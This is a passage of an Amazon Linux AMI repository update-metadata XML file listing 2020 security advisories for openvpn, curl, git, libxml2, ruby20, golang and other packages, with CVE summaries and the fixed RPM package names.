epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.57-1.85.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1410</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1410: medium priority package update for openvpn</title><issued date="2020-07-28 03:26:00" /><updated date="2020-07-29 21:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11810:
This security issue is quite hard to abuse, requiring a fairly precise timing attack combined with guessing a just assigned peer-id reference. If successful, only a single client just initiating a new connection will experience a denial of service situation. This wi why the severity is rated low.
1169925: CVE-2020-11810 openvpn: race condition between allocating peer-id and initializing data channel key
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11810" title="" id="CVE-2020-11810" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.4.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.9-1.23.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.9-1.23.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.4.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.9-1.23.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.9-1.23.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.9-1.23.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.9-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1411</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1411: medium priority package update for curl</title><issued date="2020-07-28 17:21:00" /><updated date="2020-07-29 21:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8177:
No description is available for this CVE.
1847915: CVE-2020-8177 curl: command line arguments lead to local file overwrite
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8177" title="" id="CVE-2020-8177" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.61.1" release="12.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.94.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.94.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.94.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.94.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.94.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.94.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.94.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.94.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.94.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.94.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.94.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.94.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1412</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1412: low priority package update for doxygen</title><issued date="2020-07-28 17:22:00" /><updated date="2020-07-29 21:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10245:
Insufficient sanitization of the query parameter in templates/html/search_opensearch.php could lead to reflected cross-site scripting or iframe injection.
1714190: CVE-2016-10245 doxygen: cross-site scripting in templates/html/search_opensearch.php
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10245" title="" id="CVE-2016-10245" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="doxygen-debuginfo" version="1.8.5" release="4.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/doxygen-debuginfo-1.8.5-4.14.amzn1.x86_64.rpm</filename></package><package name="doxygen" version="1.8.5" release="4.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/doxygen-1.8.5-4.14.amzn1.x86_64.rpm</filename></package><package name="doxygen-latex" version="1.8.5" release="4.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/doxygen-latex-1.8.5-4.14.amzn1.x86_64.rpm</filename></package><package name="doxygen-debuginfo" version="1.8.5" release="4.14.amzn1" epoch="1" arch="i686"><filename>Packages/doxygen-debuginfo-1.8.5-4.14.amzn1.i686.rpm</filename></package><package name="doxygen-latex" version="1.8.5" release="4.14.amzn1" epoch="1" arch="i686"><filename>Packages/doxygen-latex-1.8.5-4.14.amzn1.i686.rpm</filename></package><package name="doxygen" version="1.8.5" release="4.14.amzn1" epoch="1" arch="i686"><filename>Packages/doxygen-1.8.5-4.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1413</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1413: important priority package update for git</title><issued date="2020-07-28 17:23:00" /><updated date="2020-07-29 21:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-5260:
Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1.
1822020: CVE-2020-5260 git: Crafted URL containing new lines can cause credential leak
CVE-2020-11008:
Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. This bug is similar to CVE-2020-5260(GHSA-qm7j-c969-7j4q). The fix for that bug still left the door open for an exploit where _some_ credential is leaked (but the attacker cannot control which one). Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that are considered illegal as of the recently published Git versions can cause Git to send a "blank" pattern to helpers, missing hostname and protocol fields. Many helpers will interpret this as matching _any_ URL, and will return some unspecified stored password, leaking the password to an attacker's server. The vulnerability can be triggered by feeding a malicious URL to `git clone`. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The root of the problem is in Git itself, which should not be feeding blank input to helpers. However, the ability to exploit the vulnerability in practice depends on which helpers are in use. Credential helpers which are known to trigger the vulnerability: - Git's "store" helper - Git's "cache" helper - the "osxkeychain" helper that ships in Git's "contrib" directory Credential helpers which are known to be safe even with vulnerable versions of Git: - Git Credential Manager for Windows Any helper not in this list should be assumed to trigger the vulnerability.
1826001: CVE-2020-11008 git: Crafted URL containing new lines, empty host or lacks a scheme can cause credential leak
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11008" title="" id="CVE-2020-11008" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5260" title="" id="CVE-2020-5260" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-svn" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-subtree" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-core-doc" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.18.4" release="2.71.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.18.4-2.71.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.18.4" release="2.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.18.4-2.71.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-core" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.18.4-2.71.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.18.4" release="2.71.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.18.4-2.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1414</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1414: medium priority package update for keepalived</title><issued date="2020-08-10 22:53:00" /><updated date="2020-08-12 17:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19044:
keepalived 2.0.8 didn't check for pathnames with symlinks when writing data to a temporary file upon a call to PrintData or PrintStats. This allowed local users to overwrite arbitrary files if fs.protected_symlinks is set to 0, as demonstrated by a symlink from /tmp/keepalived.data or /tmp/keepalived.stats to /etc/passwd.
keepalived 2.0.8 didn&#039;t check for pathnames with symlinks when writing data to a temporary file upon a call to PrintData or PrintStats. This allowed local users to overwrite arbitrary files if fs.protected_symlinks is set to 0, as demonstrated by a symlink from /tmp/keepalived.data or /tmp/keepalived.stats to /etc/passwd.
99999:
CVE-2018-19044 keepalived: Improper pathname validation allows for overwrite of arbitrary filenames via symlinks
1651863: CVE-2018-19044 keepalived: Improper pathname validation allows for overwrite of arbitrary filenames via symlinks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19044" title="" id="CVE-2018-19044" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="keepalived-debuginfo" version="1.2.13" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/keepalived-debuginfo-1.2.13-8.5.amzn1.x86_64.rpm</filename></package><package name="keepalived" version="1.2.13" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/keepalived-1.2.13-8.5.amzn1.x86_64.rpm</filename></package><package name="keepalived-debuginfo" version="1.2.13" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/keepalived-debuginfo-1.2.13-8.5.amzn1.i686.rpm</filename></package><package name="keepalived" version="1.2.13" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/keepalived-1.2.13-8.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1415</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1415: important priority package update for libxml2</title><issued date="2020-08-10 22:59:00" /><updated date="2020-08-12 17:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14567:
libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251.
1619875: CVE-2018-14567 libxml2: Infinite loop caused by incorrect error detection during LZMA decompression
CVE-2018-14404:
A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case. Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application.
1595985: CVE-2018-14404 libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c
CVE-2017-18258:
The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file.
1566749: CVE-2017-18258 libxml2: Unrestricted memory usage in xz_head() function in xzlib.c
CVE-2017-15412:
Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
1523128: CVE-2017-15412 libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c
CVE-2016-5131:
Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.
1358641: CVE-2016-5131 libxml2: Use after free triggered by XPointer paths beginning with range-to
CVE-2015-8035:
The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.
1277146: CVE-2015-8035 libxml2: DoS caused by incorrect error detection during XZ decompression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8035" title="" id="CVE-2015-8035" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5131" title="" id="CVE-2016-5131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15412" title="" id="CVE-2017-15412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18258" title="" id="CVE-2017-18258" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14404" title="" id="CVE-2018-14404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14567" title="" id="CVE-2018-14567" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-python26" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.4.40.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.4.40.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.4.40.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.4.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1416</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1416: medium priority package update for ruby20</title><issued date="2020-08-10 23:07:00" /><updated date="2020-08-12 17:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10663:
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
1827500: CVE-2020-10663 rubygem-json: Unsafe Object Creation Vulnerability in JSON
CVE-2018-16396:
An issue was discovered in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. It does not taint strings that result from unpacking tainted strings with some formats.
1643089: CVE-2018-16396 ruby: Tainted flags are not propagated in Array#pack and String#unpack with some directives
1643089:
CVE-2018-16396 ruby: Tainted flags are not propagated in Array#pack and String#unpack with some directives
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16396" title="" id="CVE-2018-16396" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10663" title="" id="CVE-2020-10663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-libs" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-1.33.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-1.33.amzn1.noarch.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.33.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-1.33.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-1.33.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-1.33.amzn1.noarch.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.33.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-1.33.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.33.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.33.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-1.33.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.33.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-1.33.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1417</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1417: medium priority package update for golang</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 19:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-15586:
Go before 1.13.13 and 1.14.x before 1.14.5 has a data race in some net/http servers, as demonstrated by the httputil.ReverseProxy Handler, because it reads a request body and writes a response at the same time.
1856953: CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15586" title="" id="CVE-2020-15586" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.13.14" release="1.58.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.13.14-1.58.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.13.14" release="1.58.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.13.14-1.58.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.13.14" release="1.58.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.13.14-1.58.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.14" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.13.14-1.58.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.13.14" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.13.14-1.58.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.13.14" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.13.14-1.58.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.13.14" release="1.58.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.13.14-1.58.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.14" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.13.14-1.58.amzn1.i686.rpm</filename></package><package name="golang" version="1.13.14" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.13.14-1.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1418</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1418: low priority package update for httpd24</title><issued date="2020-08-26 23:09:00" /><updated date="2024-10-09 16:00:00" /><severity>low</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-devel" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.46" release="1.90.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.46" release="1.90.amzn1" epoch="0" 